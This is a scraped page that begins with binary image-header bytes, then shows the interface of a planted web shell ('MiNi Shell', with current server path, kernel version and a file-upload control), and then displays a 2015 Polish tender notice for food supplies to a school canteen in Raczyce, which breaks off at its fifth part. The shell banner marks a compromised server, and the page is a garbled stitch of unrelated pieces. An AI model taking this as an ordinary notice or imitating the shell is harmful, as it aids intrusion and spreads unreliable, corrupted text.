JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151126/320362-N-2015.html

<p class="kh_header"><b>Gnojno: Dostawa  artykułów  żywnościowych  na potrzeby stołówki szkolnej w Szkole Podstawowej w Raczycach</b><br>
<b>Numer ogłoszenia: 320362 - 2015; data zamieszczenia: 26.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa w Raczycach , Raczyce 64, 28-114 Gnojno, woj. świętokrzyskie, tel. 41 3532085, faks 41 3532038.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Szkoła.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  artykułów  żywnościowych  na potrzeby stołówki szkolnej w Szkole Podstawowej w Raczycach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa  artykułów  żywnościowych  na potrzeby stołówki szkolnej w Szkole Podstawowej w Raczycach z podziałem na 5 części:   
Część I  zamówienia obejmuje - mięso i produkty mięsne
Część II  zamówienia obejmuje - pieczywo, wyroby piekarskie i ciastkarskie
Część III  zamówienia obejmuje - artykuły mleczarskie
Część IV  zamówienia obejmuje - artykuły spożywcze suche i inne
Część V  zamówienia obejmuje - warzywa i owoce
Poszczególne części obejmują dostawę następujących produktów:
CZĘŚĆ I  -      MIĘSO I PRODUKTY MIĘSNE
1.	Boczek wędzony parzony	kg	50
2.	Kiełbasa cienka schabowa I klasa (80%  mięsa wieprzowego na 100g) - produkt polski	kg	1000
3.	Łopatka bez kości I klasa- produkt polski	kg	500
4.	Filet ( piersi) z kurczaka I klasa- produkt polski	kg	600
5.	Korpusy drobiowe I klasa produkt polski 	kg	300
6.	Kostka rybna panierowana	kg	800
7.	Słonina	kg	15
8.	Parówki śniadaniowe  (mięso z szynki ok. 90%, 0% MOM) kg	500
9.	Smalec	kg	30
10.	Karczek bez kości	kg	800
11.	Udka z kurczaka, ćwiartka tylna bez grzbietu 	kg	900
12.	Szynka mięso	kg	800
13.	Udziec z indyka świeży	kg	300
14.	Żeberka wieprzowe	kg	200

CZĘŚĆ II -  PIECZYWO, WYROBY PIEKARSKIE I CIASTKARSKIE
1. Chleb wiejski 0,6 kg	szt.	3500
2. Bułka zwykła (pszenna)	szt.	1600

CZEŚĆ III  - ARTYKUŁY MLECZARSKIE
1.	Śmietana kremówka 30% tłuszczu 0,5 l	szt.	500
2.	Ser biały (półtłusty)	kg	350
3.	Masło extra 200g zawartość tłuszczu 82%	szt.	400
4.	Mleko 3,2 % 1l	l	50
5.	Serki homogenizowane 150g 	szt.	1600
6.	Śmietana w kubku 400 ml 18%	szt.	100
7.	Ser żółty	kg	50
CZĘŚĆ IV - ARTYKUŁY SPOŻYWCZE SUCHE I INNE
1.	Barszcz biały w butelkach 0,5 l	szt.	400
2.	Bazylia 10g	szt.	150
3.	Buraczki słoik 340g	szt.	600
4.	Cukier 1 kg	kg	200
5.	Czosnek granulowany 20g 	szt.	500
6.	Jajka kl. L	szt.	6000
7.	Kwasek cytrynowy 20g	szt.	60
8.	Przyprawa warzywna sypka  bez glutaminianu sodu, konserwantów  i barwników 150g	szt.	800
9.	Kalafior mrożony 400g 	szt.	150
10.	Kostka mięsna 80g	szt.	50
11.	Koncentrat pomidorowy 30% 200g słoik 	szt. 	500
12.	Ketchup łagodny 500g	szt.	80
13.	Koper suszony 6g	szt.	40
14.	Kasza jęczmienna saszetki 4 x100g (opakowanie)	opak.	1000
15.	Liść laurowy 10g 	szt. 	80
16.	Magii 1l	L	30
17.	Majeranek 10g	szt.	150
18.	Makaron różny z wysoką  zawartością pszenicy durum 0,5 kg	szt.	2200
19.	Mąka typ 500 1kg	kg	250
20.	Musztarda słoik 190 g	szt.	20
21.	Ogórki kiszone 0,5kg (torebki)	szt.	250
22.	Olej z pierwszego tłoczenia, filtrowany na zimno ( butelka 3l)	szt.	180
23.	Pieprz mielony prawdziwy 15g 	szt.	80
24.	Pieprz mielony ziołowy 30g	szt.	400
25.	Pierogi różne (paczka 1kg)	kg	800
26.	Przyprawa do kurczaka 30g	szt.	100
27.	Przyprawa do karkówki 20g	szt. 	50
28.	Pietruszka suszona 6g 	szt.	100
29.	Papryka słodka 20 g	szt.	80
30.	Papryka ostra 20g	szt.	80
31.	Przecier ogórkowy w słoiku 340g	szt.	300
32.	Ryż saszetki 4x100g opakowanie 400g	opak.	300
33.	Rosołki wołowe 80g	szt.	100
34.	Rosołki drobiowe 80g 	szt.	100
35.	Sól morska o obniżonej zawartości sodu z potasem i magnezem 350g	szt.	300
36.	Soda 50g	szt.	50
37.	Susz warzywny w torebkach 100g	szt.	50
38.	Ocet 0,5l	szt.	50
39.	Sos spaghetti w słoikach 520g	szt.	500
40.	Warzywa mrożone 7-składnikowe 450g	szt.	250
41.	Ziele angielskie 12g	szt.	100
42.	Brokuły mrożone 450g	szt.	250
43.	Soki owocowe w kartoniku 200ml 	szt.	800
44.	Bułka tarta 0,5kg	 szt.	200
45.	Liść lubczyka susz 10g	szt.	100
46.	Majonez bez substancji konserwujących 1 l	l	60
47.	Groszek konserwowy 400ml	szt.	50
48.	Fasola konserwowa biała 400ml	szt.	50
49.	Fasola konserwowa czerwona 400ml	szt.	50
CZĘŚĆ V - WARZYWA I OWOCE
1.	Buraki czerwone	kg	600
2.	Cebula biała	kg	90
3.	Cytryny	kg	10
4.	Kapusta kiszona 1 kg	kg	400
5.	Marchew	kg	500
6.	Kapusta pekińska	kg	250
7.	Por	kg	50
8.	Seler korzeń	kg	50
9.	Groch łuskany połówki 0,5kg	szt.	100
10.	Kapusta biała	kg	80
11.	Jabłka	kg	150
12.	Ziemniaki	kg	5500
13.	Kapusta czerwona	kg	80
14.	Pietruszka korzeń	kg	50
15.	Koperek świeży (pęczek)	szt.	100
16.	Fasola biała 0,5kg	szt.	100
17.	Mandarynki kg	100
18.	Gruszki   - kg	200
19.	Kiwi (koszyk)	kg	100
20.	Ogórek świeży	kg	150
21.	Szczypiorek (pęczek)	szt.	50
22.	Czosnek świeży (główka)	szt.	200
23.	Pieczarki	kg	200.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.80.00.00-6, 15.30.00.00-1, 15.50.00.00-3, 15.81.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 Pzp</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 Pzp</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 Pzp
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
4. Jeżeli podmiot, o którym mowa w ust. 3  jest równocześnie podwykonawcą w rozumieniu art. 36 b ustawy pzp, w przypadku zmiany lub rezygnacji z takiego podwykonawcy wykonawca jest obowiązany wykazać zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenia zamówienia
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie oświadczeń i dokumentów, o których mowa w Rozdziale VI siwz, na zasadzie: spełnia- nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy, Formularz asortymentowo - cenowy, pełnomocnictwo - jeżeli dotyczy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - Termin płatności faktury - 2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Za zgodą Zamawiającego dopuszcza się możliwość wprowadzenia pisemnych zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie które dokonano wyboru Wykonawcy na podst. art. 144 ust. 1 ustawy w przypadku wystąpienia poniższych okoliczności:
a) zmiana obowiązującej stawki podatku VAT, spowodowana zmianą przepisów,
- zmiana umowy w tym zakresie może być wprowadzona tylko na wniosek Wykonawcy. Jednocześnie Wykonawca zobowiązuje się do przedstawienia Zamawiającemu podstawy prawnej do podwyższenia lub obniżenia cen towarów np. rozporządzenie, obwieszczenie, ustawa lub innej podstawy do zmiany cen - zmiany umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.gminy.com.pl/gnojno/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Gnojno, Gnojno 145, 28-114 Gnojno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.12.2015 godzina 09:30, miejsce: Urząd Gminy Gnojno, Gnojno 145, 28-114 Gnojno, pokój nr 11 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa artykułów żywnościowych na potrzeby stołówki szkolnej w Szkole Podstawowej w Raczycach z podziałem na 5 części:   
CZĘŚĆ I  -   MIĘSO I PRODUKTY MIĘSNE
1.	Boczek wędzony parzony	kg	50
2.	Kiełbasa cienka schabowa I klasa (80%  mięsa wieprzowego na 100g) - produkt polski	kg	1000
3.	Łopatka bez kości I klasa- produkt polski	kg	500
4.	Filet ( piersi) z kurczaka I klasa- produkt polski	kg	600
5.	Korpusy drobiowe I klasa produkt polski 	kg	300
6.	Kostka rybna panierowana	kg	800
7.	Słonina	kg	15
8.	Parówki śniadaniowe  (mięso z szynki ok. 90%, 0% MOM) kg	500
9.	Smalec	kg	30
10.	Karczek bez kości	kg	800
11.	Udka z kurczaka, ćwiartka tylna bez grzbietu 	kg	900
12.	Szynka mięso	kg	800
13.	Udziec z indyka świeży	kg	300
14.	Żeberka wieprzowe	kg	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Termin płatności faktury - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pieczywo, wyroby piekarskie i ciastkarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa artykułów żywnościowych na potrzeby stołówki szkolnej w Szkole Podstawowej w Raczycach z podziałem na 5 części:  
CZĘŚĆ II -  PIECZYWO, WYROBY PIEKARSKIE I CIASTKARSKIE
1. Chleb wiejski 0,6 kg	szt.	3500
2. Bułka zwykła (pszenna)	szt.	1600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Termin płatności faktury - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Artykuły mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa artykułów żywnościowych na potrzeby stołówki szkolnej w Szkole Podstawowej w Raczycach z podziałem na 5 części:   
CZEŚĆ III  - ARTYKUŁY MLECZARSKIE
1.	Śmietana kremówka 30% tłuszczu 0,5 l	szt.	500
2.	Ser biały (półtłusty)	kg	350
3.	Masło extra 200g zawartość tłuszczu 82%	szt.	400
4.	Mleko 3,2 % 1l	l	50
5.	Serki homogenizowane 150g 	szt.	1600
6.	Śmietana w kubku 400 ml 18%	szt.	100
7.	Ser żółty	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Termin płatności faktury - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Artykuły spożywcze suche i inne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa artykułów żywnościowych na potrzeby stołówki szkolnej w Szkole Podstawowej w Raczycach z podziałem na 5 części:   
CZĘŚĆ IV - ARTYKUŁY SPOŻYWCZE SUCHE I INNE
1.	Barszcz biały w butelkach 0,5 l	szt.	400
2.	Bazylia 10g	szt.	150
3.	Buraczki słoik 340g	szt.	600
4.	Cukier 1 kg	kg	200
5.	Czosnek granulowany 20g 	szt.	500
6.	Jajka kl. L	szt.	6000
7.	Kwasek cytrynowy 20g	szt.	60
8.	Przyprawa warzywna sypka  bez glutaminianu sodu, konserwantów  i barwników 150g	szt.	800
9.	Kalafior mrożony 400g 	szt.	150
10.	Kostka mięsna 80g	szt.	50
11.	Koncentrat pomidorowy 30% 200g słoik 	szt. 	500
12.	Ketchup łagodny 500g	szt.	80
13.	Koper suszony 6g	szt.	40
14.	Kasza jęczmienna saszetki 4 x100g (opakowanie)	opak.	1000
15.	Liść laurowy 10g 	szt. 	80
16.	Magii 1l	L	30
17.	Majeranek 10g	szt.	150
18.	Makaron różny z wysoką  zawartością pszenicy durum 0,5 kg	szt.	2200
19.	Mąka typ 500 1kg	kg	250
20.	Musztarda słoik 190 g	szt.	20
21.	Ogórki kiszone 0,5kg (torebki)	szt.	250
22.	Olej z pierwszego tłoczenia, filtrowany na zimno ( butelka 3l)	szt.	180
23.	Pieprz mielony prawdziwy 15g 	szt.	80
24.	Pieprz mielony ziołowy 30g	szt.	400
25.	Pierogi różne (paczka 1kg)	kg	800
26.	Przyprawa do kurczaka 30g	szt.	100
27.	Przyprawa do karkówki 20g	szt. 	50
28.	Pietruszka suszona 6g 	szt.	100
29.	Papryka słodka 20 g	szt.	80
30.	Papryka ostra 20g	szt.	80
31.	Przecier ogórkowy w słoiku 340g	szt.	300
32.	Ryż saszetki 4x100g opakowanie 400g	opak.	300
33.	Rosołki wołowe 80g	szt.	100
34.	Rosołki drobiowe 80g 	szt.	100
35.	Sól morska o obniżonej zawartości sodu z potasem i magnezem 350g	szt.	300
36.	Soda 50g	szt.	50
37.	Susz warzywny w torebkach 100g	szt.	50
38.	Ocet 0,5l	szt.	50
39.	Sos spaghetti w słoikach 520g	szt.	500
40.	Warzywa mrożone 7-składnikowe 450g	szt.	250
41.	Ziele angielskie 12g	szt.	100
42.	Brokuły mrożone 450g	szt.	250
43.	Soki owocowe w kartoniku 200ml 	szt.	800
44.	Bułka tarta 0,5kg	 szt.	200
45.	Liść lubczyka susz 10g	szt.	100
46.	Majonez bez substancji konserwujących 1 l	l	60
47.	Groszek konserwowy 400ml	szt.	50
48.	Fasola konserwowa biała 400ml	szt.	50
49.	Fasola konserwowa czerwona 400ml	szt.	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Termin płatności faktury - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Warzywa i owoce.</p>
